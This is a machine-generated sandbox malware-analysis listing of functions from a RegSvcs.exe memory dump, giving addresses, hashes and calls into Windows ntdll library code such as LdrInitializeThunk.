Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 82804b25de4a6750f842cb0fa265974d8bbb30ea8779c96341a657b6ca5b7f31
Instruction ID: da470a4a43a7eb88612ea0928f6ec341ff8bd35606e6c03f3345fd6fbb17fec6
Opcode Fuzzy Hash: 82804b25de4a6750f842cb0fa265974d8bbb30ea8779c96341a657b6ca5b7f31
Instruction Fuzzy Hash: 34900225211810030105B9580F05507008A97D5351355C021F5015654DDA2189615621

Function 01612D30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(015FA52A,000000FF,?,016C67F8,016AC9A0,00000020,015FA460,016C689C,00000000,0000001D,?,01032CD8), ref: 01612D3A

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e7f4418103e1423287e7ebe8b93eec6f2de92969256f1b8138cf34553198460c
Instruction ID: 5bd3f11c1d170827f026bdc04e54e6b636cb1c3d86ede53c1f2a3267f43177a5
Opcode Fuzzy Hash: e7f4418103e1423287e7ebe8b93eec6f2de92969256f1b8138cf34553198460c
Instruction Fuzzy Hash: 9A90022130181003D14075585C196074049E7E1301F55D011E4414658DDD1589565722

Function 01612D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0165B508,00000004,000000FF,0000001E,00000000,00000000,00000000,C0000409,00000001,00000000,00000004,00000004,000F0007,C0000001,?,00000004), ref: 01612D1A

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 680cd5e01ab0f0d4f2b1e24d00b39fca9420e5dc4be62eb81a2c196a04d892d7
Instruction ID: d6b9c97ea60c09f22b0e332a2be958f2e17ba507b666c18a5201ff19916f81f5
Opcode Fuzzy Hash: 680cd5e01ab0f0d4f2b1e24d00b39fca9420e5dc4be62eb81a2c196a04d892d7
Instruction Fuzzy Hash: 8890022921381002D18075585C0960B004997D1202F95D415E401565CDCD1589695721

Function 01612DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0164E73E,0000005A,016AD040,00000020,00000000,016AD040,00000080,01634A81,00000000,?,?,00000002,00000000,?,?,0161AE00), ref: 01612DFA

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6215539effea25498739c4f86c52e40957075287f3772b355c5e7502994ac92d
Instruction ID: b5e063e97dac60862e39fc2274650432662772cdad3c4ab3eaf8be652ac7df7a
Opcode Fuzzy Hash: 6215539effea25498739c4f86c52e40957075287f3772b355c5e7502994ac92d
Instruction Fuzzy Hash: E690023120181413D11175584D05707004D97D0241F95C412E442465CEDA568A52A621

Function 01612DD0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(016291A3,00000000,00000000,?,?,?,015D8A1A,016AC2B0,00000018,015C8873), ref: 01612DDA

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4400ff1e14956eea25af7eecb98d9736066453191c0edc1d5d29e80993a733b
Instruction ID: ae755583a0ad4ee051405baf45d47e3c91f5a886c01832cfb6b0df815340851f
Opcode Fuzzy Hash: d4400ff1e14956eea25af7eecb98d9736066453191c0edc1d5d29e80993a733b
Instruction Fuzzy Hash: D1900221242851525545B5584C05507404AA7E0241795C012E5414A54DC9269956DB21

Function 01612C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(015CFB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,01627BE5,00001000,00004000,000000FF,?,00000000), ref: 01612C7A

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e293fe5b84ac368a4a0bdfe12cddbe9cfc2362aa6d56c4605eddc10e2a687b0
Instruction ID: f889ed1cfa4773b280cc71c7ddb9c411a150ecaafc2c97523976c8b5e050171b
Opcode Fuzzy Hash: 2e293fe5b84ac368a4a0bdfe12cddbe9cfc2362aa6d56c4605eddc10e2a687b0
Instruction Fuzzy Hash: 8D90023120189802D11075588C0574B004997D0301F59C411E842475CECA9589917621

Function 01612C1D Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0162FD4F,000000FF,00000024,016C6634,00000004,00000000,?,-00000018,7D810F61,?,?,015E8B12,?,?,?,?), ref: 01612C24

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fa7d031ee38712a4f64ec2343cd81cc7fe23154835354bd5e4e322d446f777d8
Instruction ID: 0a298b5bd01292a6bc04a8f771d9dcf7a4377714d563895da1ae064360e4bc06
Opcode Fuzzy Hash: fa7d031ee38712a4f64ec2343cd81cc7fe23154835354bd5e4e322d446f777d8
Instruction Fuzzy Hash: 56A00231551605478241AA144D4546DA298BAD022535BC357D50645D5F4B2C1493B661

Function 01612CA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(015F3999,000000FA,00000001,?,00000050,?,?), ref: 01612CAA

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b590c29623a8487feeb08961c2722d046e05bf47ca0f82eb515fd1136e90bdf1
Instruction ID: 0fd791b217d23798141692c51e5c8413608df0afa7fbeadf5a6ef1ae70b95c60
Opcode Fuzzy Hash: b590c29623a8487feeb08961c2722d046e05bf47ca0f82eb515fd1136e90bdf1
Instruction Fuzzy Hash: 2C90023120181402D10079985C09647004997E0301F55D011E9024659FCA6589916631

Function 01612F30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0165B4E6,00000004,000F0007,C0000001,?,00000004,08000000,00000000,00000000,00000000,00000000,00000058), ref: 01612F3A

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9829b8bf5b8e49ab88216082e65ba67f6f910999e325e689a092d116a0d1a210
Instruction ID: b02df82243e4eb097a483bfb82dd66210e51dec4323e80a516f33e0624d75724
Opcode Fuzzy Hash: 9829b8bf5b8e49ab88216082e65ba67f6f910999e325e689a092d116a0d1a210
Instruction Fuzzy Hash: 3F90026134181442D10075584C15B070049D7E1301F55C015E5064658ECA19CD526626

Function 01612FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(016117E5,00000001,C0100080,00000018,?,00000000,00000080,00000005,000000FE,00000068,00000000,00000000,?,00000000,00000000,?), ref: 01612FEA

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bf99e8023c779d4a2067d628ea230ef158ef8fa55ca9a121b4c6568d671f9775
Instruction ID: 8d61b361bc60a45343750d85b577a1da4f5651c903fc5cc6c0ab952afb5a6e06
Opcode Fuzzy Hash: bf99e8023c779d4a2067d628ea230ef158ef8fa55ca9a121b4c6568d671f9775
Instruction Fuzzy Hash: 5B900221211C1042D20079684C15B07004997D0303F55C115E4154658DCD1589615A21

Function 01612FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(016105E3,00000000,00000000,00000001,00000000,00000000,00000000,?,01612380,016103B6,00000000,00000000,?,00000000,?), ref: 01612FBA

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0c5394b77865c7da7c55607b7c92e9f0e77b2661c0030382121dac99ddf6a8b2
Instruction ID: fb37c67d5be50593c08bd7c6394e8be4d678b1f3622c3447bb98d6c822d377d6
Opcode Fuzzy Hash: 0c5394b77865c7da7c55607b7c92e9f0e77b2661c0030382121dac99ddf6a8b2
Instruction Fuzzy Hash: B390022160181042414075688C459074049BBE1211755C121E4998654EC95989655B65

Function 01612F90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0164CF47,000000FF,?,?,00000000,?,00000000,?,?), ref: 01612F9A

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e2163b064879e2f613defe4685261441c2e98b8a9ef24ab30a0f9a0fb06ca3c
Instruction ID: 73f74937a717ec2f65fe6866114243ac865205125b951366e627f7c81cecb004
Opcode Fuzzy Hash: 8e2163b064879e2f613defe4685261441c2e98b8a9ef24ab30a0f9a0fb06ca3c
Instruction Fuzzy Hash: E4900231201C1402D10075584C1570B004997D0302F55C011E5164659ECA2589516A71

Function 01612EA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01631B8A,?,00000000,00000001,00000010,00000000,00000000,000000FE,00000005,?,00000004,?,00000004,?,00000002,?), ref: 01612EAA

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e55256d0dc0c1f6415fc9f319ab0d1dfc82484d633d7d636122bdd20f050617
Instruction ID: bf36bbdc61ccc0d6d2b07e5664eb95841635d23c8cd1ab6a19a7446d1b91be6a
Opcode Fuzzy Hash: 4e55256d0dc0c1f6415fc9f319ab0d1dfc82484d633d7d636122bdd20f050617
Instruction Fuzzy Hash: 6890027120181402D14075584C05747004997D0301F55C011E9064658FCA598ED56B65

Function 01612E80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0165809B,?,?,?,?,?), ref: 01612E8A

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3fc68f86644d78a36b620b12ff5e532c25be8d73f6141186aece8094a3357b29
Instruction ID: 20c487206ed887156b1a66d173fba9dccda979343c72250b43d1abd58805ff17
Opcode Fuzzy Hash: 3fc68f86644d78a36b620b12ff5e532c25be8d73f6141186aece8094a3357b29
Instruction Fuzzy Hash: 1B90022160181502D10175584C05617004E97D0241F95C022E5024659FCE258A92A631

Function 0041F06D Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2165846268.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_41f000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b2a21052558e81bac1299893efe0f5989b8ec20f12056ef22405cdcc0cabd1
Instruction ID: bbcd9e0c7495b4b3c71782add9bd9e92ecbfcf2a3e8267f7fc475ee2e27bc91e
Opcode Fuzzy Hash: 02b2a21052558e81bac1299893efe0f5989b8ec20f12056ef22405cdcc0cabd1
Instruction Fuzzy Hash: 63B0127495531E03041035B0264316977148581408B0003999DCC0F192EE01842302C3

Function 0041F070 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2165846268.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_41f000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0823cfae073da212eb333ff970e5c6e7a9f36da7609cc17c3dd2c68a5e4798d
Instruction ID: 799c57cb42787c0bf5d1ce17ac39346a2abfc1e09e798fb22bcb30c317675207
Opcode Fuzzy Hash: f0823cfae073da212eb333ff970e5c6e7a9f36da7609cc17c3dd2c68a5e4798d
Instruction Fuzzy Hash: A2A022A0C2830C03002030FA2B03023B30CC000008F8003EAAE8C022223C02A83300EB

Non-executed Functions

Function 01654755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01654809

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01654888
minkernel\ntdll\ldrredirect.c, xrefs: 01654899
LdrpCheckRedirection, xrefs: 0165488F

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 1ecd4ec2ede2208e4a0a97077b06b6e1e11cdd82d69dcb80010b9830d261dfc4
Instruction ID: a09772f71106e4bcef0d71204cf1a6c73e76e123504cbbdd0a44eee0d84d1afc
Opcode Fuzzy Hash: 1ecd4ec2ede2208e4a0a97077b06b6e1e11cdd82d69dcb80010b9830d261dfc4
Instruction Fuzzy Hash: 1C41D132A042519FCBA1CE69DC40A367BE9BF49A50F0605ADED899B311FB30D890CB91

Function 0161096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01612DF0: LdrInitializeThunk.NTDLL(0164E73E,0000005A,016AD040,00000020,00000000,016AD040,00000080,01634A81,00000000,?,?,00000002,00000000,?,?,0161AE00), ref: 01612DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01610BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01610BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01610D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01610D74

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 8996dd8962210995b415df85550f3a5edb728adef428b8332e5486128b3f33ec
Instruction ID: f77c40b0ee8fe5d168f60993b585c568c41a2908285222944f6c0fa1182f3f65
Opcode Fuzzy Hash: 8996dd8962210995b415df85550f3a5edb728adef428b8332e5486128b3f33ec
Instruction Fuzzy Hash: 4C426B75900715DFDB21CF28CC80BAAB7F5BF48314F1885A9E989EB245D770AA85CF60

Function 015DEA80 Relevance: 6.1, Strings: 4, Instructions: 1073COMMON

Download Yara Rule

Strings

, xrefs: 015DF299
T, xrefs: 015DEB4E
R, xrefs: 015DEB62
{, xrefs: 01634643

Memory Dump Source

